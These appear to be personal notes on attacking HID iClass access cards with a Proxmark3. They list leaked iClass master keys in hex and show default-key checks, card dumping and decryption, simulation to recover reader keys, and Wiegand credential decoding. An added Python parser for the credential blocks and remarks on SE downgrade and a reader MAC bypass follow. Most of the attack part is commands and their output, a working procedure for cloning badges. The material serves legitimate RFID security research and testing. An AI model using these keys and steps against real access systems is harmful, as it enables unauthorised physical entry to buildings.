HID iClass
- High frequency, 13.56 MHz
- Messages to and from a reader carry a MAC
- Uses the ISO 14443-4 Type A protocol
- Uses the INCrypt32 algorithm
Heart of Darkness key: aea684a6dab23278
PicoPass
iClass Legacy
- The cryptography and keys have been leaked
- You can also clone the card by copying its encrypted data as-is. Even if the ID comes from a different card, the copy still works.
Dump Static Keys:
[usb] pm3 --> hf iclass managekeys -p
[=] idx| key
[=] ---+------------------------
[=] 0 | AE A6 84 A6 DA B2 32 78
[=] 1 | FD CB 5A 52 EA 8F 30 90
[=] 2 | F0 E1 D2 C3 B4 A5 96 87
[=] 3 | 76 65 54 43 32 21 10 00
[=] 4 |
[=] 5 |
[=] 6 |
[=] 7 |
[=] ---+------------------------
#Test Known Keys
hf iclass chk -f iclass_default_keys.dic
Dump with known keys:
#Check unlocked keys
hf iclass dump --ki 0
hf iclass dump --ki 1
hf iclass dump --ki 2
hf iclass dump --ki 3
hf iclass dump --ki 4
Decrypt Encrypted User Data:
[usb] pm3 --> hf iclass dump --ki 4
[+] Using AA1 (debit) key[4] 20 20 66 66 66 66 88 88
[=] Card has at least 2 application areas. AA1 limit 18 (0x12) AA2 limit 31 (0x1F)
.
[=] --------------------------- Tag memory ----------------------------
[=] block# | data | ascii |lck| info
[=] ---------+-------------------------+----------+---+----------------
[=] 0/0x00 | F8 BC 03 14 FE FF 12 E0 | ........ | | CSN
[=] 1/0x01 | 12 FF FF FF 7F 1F FF 3C | .......< | | Config
[=] 2/0x02 | FF FF FF FF FD FF FF FF | ........ | | E-purse
[=] 3/0x03 | 44 DC D1 AF C0 97 7F E2 | D....... | | Debit
[=] 4/0x04 | FF FF FF FF FF FF FF FF | ........ | | Credit
[=] 5/0x05 | FF FF FF FF FF FF FF FF | ........ | | AIA
[=] 6/0x06 | 03 03 03 03 00 03 E0 17 | ........ | | User / HID CFG
[=] 7/0x07 | 8B EB ED DD 53 68 59 3B | ....ShY; | | User / Enc Cred
[=] 8/0x08 | 2A D4 C8 21 1F 99 68 71 | *..!..hq | | User / Enc Cred
[=] 9/0x09 | 2A D4 C8 21 1F 99 68 71 | *..!..hq | | User / Enc Cred
[=] 10/0x0A | FF FF FF FF FF FF FF FF | ........ | | User
[=] 11/0x0B | FF FF FF FF FF FF FF FF | ........ | | User
[=] 12/0x0C | FF FF FF FF FF FF FF FF | ........ | | User
[=] 13/0x0D | FF FF FF FF FF FF FF FF | ........ | | User
[=] 14/0x0E | FF FF FF FF FF FF FF FF | ........ | | User
[=] 15/0x0F | FF FF FF FF FF FF FF FF | ........ | | User
[=] 16/0x10 | FF FF FF FF FF FF FF FF | ........ | | User
[=] 17/0x11 | FF FF FF FF FF FF FF FF | ........ | | User
[=] 18/0x12 | FF FF FF FF FF FF FF FF | ........ | | User
[=] ---------+-------------------------+----------+---+----------------
[?] yellow = legacy credential
[+] saving dump file - 19 blocks read
[+] saved 152 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-F8BC0314FEFF12E0-dump.bin
[+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-F8BC0314FEFF12E0-dump.json
[?] Try `hf iclass decrypt -f` to decrypt dump file
[?] Try `hf iclass view -f` to view dump file
[usb] pm3 --> hf iclass decrypt -f hf-iclass-F8BC0314FEFF12E0-dump.bin
[+] loaded 152 bytes from binary file `hf-iclass-F8BC0314FEFF12E0-dump.bin`
[+] loaded 16 bytes from binary file `iclass_decryptionkey.bin`
[!] Actual file len 152 vs HID app-limit len 144
[=] Setting limit to 144
[+] saved 152 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-F8BC0314FEFF12E0-dump-decrypted.bin
[+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-F8BC0314FEFF12E0-dump-decrypted.json
[=] --------------------------- Tag memory ----------------------------
[=] block# | data | ascii |lck| info
[=] ---------+-------------------------+----------+---+----------------
[=] 0/0x00 | F8 BC 03 14 FE FF 12 E0 | ........ | | CSN
[=] 1/0x01 | 12 FF FF FF 7F 1F FF 3C | .......< | | Config
[=] 2/0x02 | FF FF FF FF FD FF FF FF | ........ | | E-purse
[=] 3/0x03 | 44 DC D1 AF C0 97 7F E2 | D....... | | Debit
[=] 4/0x04 | FF FF FF FF FF FF FF FF | ........ | | Credit
[=] 5/0x05 | FF FF FF FF FF FF FF FF | ........ | | AIA
[=] 6/0x06 | 03 03 03 03 00 03 E0 14 | ........ | | User / HID CFG
[=] 7/0x07 | 00 00 00 00 05 97 61 50 | ......aP | | User / Cred
[=] 8/0x08 | 00 00 00 00 00 00 00 00 | ........ | | User / Cred
[=] 9/0x09 | 00 00 00 00 00 00 00 00 | ........ | | User / Cred
[=] 10/0x0A | FF FF FF FF FF FF FF FF | ........ | | User
[=] 11/0x0B | FF FF FF FF FF FF FF FF | ........ | | User
[=] 12/0x0C | FF FF FF FF FF FF FF FF | ........ | | User
[=] 13/0x0D | FF FF FF FF FF FF FF FF | ........ | | User
[=] 14/0x0E | FF FF FF FF FF FF FF FF | ........ | | User
[=] 15/0x0F | FF FF FF FF FF FF FF FF | ........ | | User
[=] 16/0x10 | FF FF FF FF FF FF FF FF | ........ | | User
[=] 17/0x11 | FF FF FF FF FF FF FF FF | ........ | | User
[=] 18/0x12 | FF FF FF FF FF FF FF FF | ........ | | User
[=] ---------+-------------------------+----------+---+----------------
[?] yellow = legacy credential
[=] Block 7 decoder
[+] Binary..................... 101100101110110000101010000
[=] Wiegand decode
[+] [H10301 ] HID H10301 26-bit FC: 203 CN: 45224 parity ( ok )
[+] [ind26 ] Indala 26-bit FC: 3259 CN: 168 parity ( ok )
[=] found 2 matching formats
[=] -----------------------------------------------------------------
[usb] pm3 -->
Test for static key 0:
hf iclass dump -k "5B 7C 62 C4 91 C1 1B 39"
Use Default Keys:
hf iclass chk -f iclass_default_keys.dic
Simulate a card to a reader to recover its key:
# Use the Proxmark to simulate an iClass card and collect reader MACs
hf iclass sim -t 2
# Then run loclass on the collected data to recover the reader's key
hf iclass loclass -f ../dumps/iclass_mac_attack.bin
Simulate other cards:
# Specify a CSN
hf iclass sim -t 0 --csn 031FEC8AF7FF12E0
# Use the default CSN
hf iclass sim -t 1
# Simulate a full 2K tag
hf iclass sim -t 3
# Reader attack
hf iclass sim -t 4
iClass Elite
https://swende.se/blog/Elite-Hacking.html
- loclass attack
Test Known Keys:
[usb] pm3 --> hf iclass chk -f iclass_default_keys.dic --elite
[+] loaded 28 keys from dictionary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\dictionaries/iclass_default_keys.dic
[+] Reading tag CSN / CCNR...
[+] CSN: 97 F5 15 14 FE FF 12 E0
[+] CCNR: FC FF FF FF FF FF FF FF 00 00 00 00
[=] Generating diversified keys using elite algo
[+] Searching for DEBIT key...
[+] Found valid key 20 20 66 66 66 66 88 88
[+] time in iclass chk 0.8 seconds
[+] Added key to keyslot 4
[?] Try `hf iclass managekeys -p` to view keys
List known Keys:
[usb] pm3 --> hf iclass managekeys -p
[=] idx| key
[=] ---+------------------------
[=] 0 | AE A6 84 A6 DA B2 32 78
[=] 1 | FD CB 5A 52 EA 8F 30 90
[=] 2 | F0 E1 D2 C3 B4 A5 96 87
[=] 3 | 76 65 54 43 32 21 10 00
[=] 4 | 20 20 66 66 66 66 88 88
[=] 5 |
[=] 6 |
[=] 7 |
[=] ---+------------------------
Dump Card:
[usb] pm3 --> hf iclass dump --ki 4 --elite
[+] Using AA1 (debit) key[4] 20 20 66 66 66 66 88 88
[=] Card has at least 2 application areas. AA1 limit 18 (0x12) AA2 limit 31 (0x1F)
.
[=] --------------------------- Tag memory ----------------------------
[=] block# | data | ascii |lck| info
[=] ---------+-------------------------+----------+---+----------------
[=] 0/0x00 | 97 F5 15 14 FE FF 12 E0 | ........ | | CSN
[=] 1/0x01 | 12 FF FF FF 7F 1F FF 3C | .......< | | Config
[=] 2/0x02 | FC FF FF FF FF FF FF FF | ........ | | E-purse
[=] 3/0x03 | 5A 81 46 19 E0 47 82 89 | Z.F..G.. | | Debit
[=] 4/0x04 | FF FF FF FF FF FF FF FF | ........ | | Credit
[=] 5/0x05 | FF FF FF FF FF FF FF FF | ........ | | AIA
[=] 6/0x06 | 03 03 03 03 00 03 E0 17 | ........ | | User / HID CFG
[=] 7/0x07 | 40 9D C6 43 21 42 A4 C6 | @..C!B.. | | User / Enc Cred
[=] 8/0x08 | 2A D4 C8 21 1F 99 68 71 | *..!..hq | | User / Enc Cred
[=] 9/0x09 | 2A D4 C8 21 1F 99 68 71 | *..!..hq | | User / Enc Cred
[=] 10/0x0A | FF FF FF FF FF FF FF FF | ........ | | User
[=] 11/0x0B | FF FF FF FF FF FF FF FF | ........ | | User
[=] 12/0x0C | FF FF FF FF FF FF FF FF | ........ | | User
[=] 13/0x0D | FF FF FF FF FF FF FF FF | ........ | | User
[=] 14/0x0E | FF FF FF FF FF FF FF FF | ........ | | User
[=] 15/0x0F | FF FF FF FF FF FF FF FF | ........ | | User
[=] 16/0x10 | FF FF FF FF FF FF FF FF | ........ | | User
[=] 17/0x11 | FF FF FF FF FF FF FF FF | ........ | | User
[=] 18/0x12 | FF FF FF FF FF FF FF FF | ........ | | User
[=] ---------+-------------------------+----------+---+----------------
[?] yellow = legacy credential
Decrypt Card:
[usb] pm3 --> hf iclass decrypt -f hf-iclass-97F51514FEFF12E0-dump.bin
[+] loaded 152 bytes from binary file `hf-iclass-97F51514FEFF12E0-dump.bin`
[+] loaded 16 bytes from binary file `iclass_decryptionkey.bin`
[!] Actual file len 152 vs HID app-limit len 144
[=] Setting limit to 144
[+] saved 152 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-97F51514FEFF12E0-dump-decrypted.bin
[+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-97F51514FEFF12E0-dump-decrypted.json
[=] --------------------------- Tag memory ----------------------------
[=] block# | data | ascii |lck| info
[=] ---------+-------------------------+----------+---+----------------
[=] 0/0x00 | 97 F5 15 14 FE FF 12 E0 | ........ | | CSN
[=] 1/0x01 | 12 FF FF FF 7F 1F FF 3C | .......< | | Config
[=] 2/0x02 | FC FF FF FF FF FF FF FF | ........ | | E-purse
[=] 3/0x03 | 5A 81 46 19 E0 47 82 89 | Z.F..G.. | | Debit
[=] 4/0x04 | FF FF FF FF FF FF FF FF | ........ | | Credit
[=] 5/0x05 | FF FF FF FF FF FF FF FF | ........ | | AIA
[=] 6/0x06 | 03 03 03 03 00 03 E0 14 | ........ | | User / HID CFG
[=] 7/0x07 | 00 00 00 00 05 97 63 04 | ......c. | | User / Cred
[=] 8/0x08 | 00 00 00 00 00 00 00 00 | ........ | | User / Cred
[=] 9/0x09 | 00 00 00 00 00 00 00 00 | ........ | | User / Cred
[=] 10/0x0A | FF FF FF FF FF FF FF FF | ........ | | User
[=] 11/0x0B | FF FF FF FF FF FF FF FF | ........ | | User
[=] 12/0x0C | FF FF FF FF FF FF FF FF | ........ | | User
[=] 13/0x0D | FF FF FF FF FF FF FF FF | ........ | | User
[=] 14/0x0E | FF FF FF FF FF FF FF FF | ........ | | User
[=] 15/0x0F | FF FF FF FF FF FF FF FF | ........ | | User
[=] 16/0x10 | FF FF FF FF FF FF FF FF | ........ | | User
[=] 17/0x11 | FF FF FF FF FF FF FF FF | ........ | | User
[=] 18/0x12 | FF FF FF FF FF FF FF FF | ........ | | User
[=] ---------+-------------------------+----------+---+----------------
[?] yellow = legacy credential
[=] Block 7 decoder
[+] Binary..................... 101100101110110001100000100
[=] Wiegand decode
[+] [H10301 ] HID H10301 26-bit FC: 203 CN: 45442 parity ( ok )
[+] [ind26 ] Indala 26-bit FC: 3259 CN: 386 parity ( ok )
[=] found 2 matching formats
[=] -----------------------------------------------------------------
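The two "Block 7 decoder" sections above (the Legacy dump and the Elite dump) both show the Proxmark3 turning the decrypted block 7 into a binary string and decoding it as an H10301 26-bit Wiegand credential. The following added example (my own code, not from this page or the Proxmark3 project) does the same decode so the layout is visible: it splits a dump into 8-byte blocks, reads the application-area 1 limit from the config block, strips the sentinel bit that precedes the Wiegand frame in block 7, and verifies both H10301 parity bits. The sample dump is constructed from the decrypted blocks printed on this page; the block/offset layout it assumes is the one the Proxmark3 output above labels.

```python
"""Parse an iClass (PicoPass) dump and decode the legacy HID credential.

Added example; not code from this page or from the Proxmark3 project.
Assumptions: the dump is the raw 8-byte-block layout shown in the Proxmark3
output above (block 0 CSN, block 1 config with byte 0 = application-area 1
limit, block 7 = the credential once decrypted). The credential is stored as
a sentinel '1' bit followed by the Wiegand frame, and H10301 is the standard
26-bit layout: even parity, 8-bit facility code, 16-bit card number, odd parity.
"""
from typing import List, NamedTuple

BLOCK_SIZE = 8

# Constructed sample: decrypted blocks 0-9 from the first dump on this page,
# padded with 0xFF blocks to the 19 blocks (152 bytes) a real dump file has.
SAMPLE_DUMP = bytes.fromhex(
    "F8BC0314FEFF12E0"   # 0  CSN
    "12FFFFFF7F1FFF3C"   # 1  Config, byte 0 = AA1 limit (0x12 = 18)
    "FFFFFFFFFDFFFFFF"   # 2  E-purse
    "44DCD1AFC0977FE2"   # 3  Debit key slot (as stored)
    "FFFFFFFFFFFFFFFF"   # 4  Credit
    "FFFFFFFFFFFFFFFF"   # 5  AIA
    "030303030003E014"   # 6  HID CFG
    "0000000005976150"   # 7  Credential (decrypted)
    "0000000000000000"   # 8  Credential continuation
    "0000000000000000"   # 9  Credential continuation
) + b"\xff" * BLOCK_SIZE * 9


class H10301(NamedTuple):
    fc: int          # facility code
    cn: int          # card number
    parity_ok: bool  # both parity bits verified


def split_blocks(dump: bytes) -> List[bytes]:
    """Cut a dump file into 8-byte PicoPass blocks."""
    if len(dump) % BLOCK_SIZE:
        raise ValueError("dump length is not a multiple of the block size")
    return [dump[i:i + BLOCK_SIZE] for i in range(0, len(dump), BLOCK_SIZE)]


def app1_limit(blocks: List[bytes]) -> int:
    """Application-area 1 limit from the config block (block 1, byte 0)."""
    return blocks[1][0]


def credential_bits(block7: bytes) -> str:
    """Block 7 as a bit string with leading zeros dropped (the Proxmark3
    'Binary' line): a sentinel '1' followed by the Wiegand frame."""
    value = int.from_bytes(block7, "big")
    if value == 0:
        raise ValueError("block 7 holds no credential")
    return format(value, "b")


def decode_h10301(frame: str) -> H10301:
    """Decode a 26-bit H10301 Wiegand frame and verify both parity bits."""
    if len(frame) != 26 or set(frame) - {"0", "1"}:
        raise ValueError("not a 26-bit frame")
    bits = [int(b) for b in frame]
    fc = int(frame[1:9], 2)            # bits 1..8
    cn = int(frame[9:25], 2)           # bits 9..24
    even_ok = sum(bits[0:13]) % 2 == 0  # bit 0 + bits 1..12 must be even
    odd_ok = sum(bits[13:26]) % 2 == 1  # bits 13..24 + bit 25 must be odd
    return H10301(fc, cn, even_ok and odd_ok)


def decode_block7(block7: bytes) -> H10301:
    """Strip the sentinel bit from block 7 and decode the frame behind it."""
    return decode_h10301(credential_bits(block7)[1:])


if __name__ == "__main__":
    blocks = split_blocks(SAMPLE_DUMP)
    print("blocks:", len(blocks), "AA1 limit:", app1_limit(blocks))
    print("Binary:", credential_bits(blocks[7]))
    print(decode_block7(blocks[7]))
```

Running it on the constructed dump reproduces the page's `FC: 203 CN: 45224 parity ( ok )`; feeding it the Elite card's decrypted block 7 (`00 00 00 00 05 97 63 04`) gives `FC: 203 CN: 45442`. Flipping any bit of the frame makes `parity_ok` false, which is the check a reader performs before trusting the number.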
iClass SR
- Transitional card that sits between iClass Legacy and SE
iClass SE
- Uses the PicoPass protocol
- The standard key and KDF have not been leaked
- Can be downgraded to Legacy or SR cards
- Contains a smart card
- Digital signature authentication
- Encrypted
SIO: encrypted Wiegand payload (ASN.1) plus an authentication MAC. Copying the data to another card won't work.
- Write keys are based on the UID/CSN
Note
Readers have a bug that allows a MAC bypass
Dumping SIO Replay NRMAC
If you make a card with the same encrypted data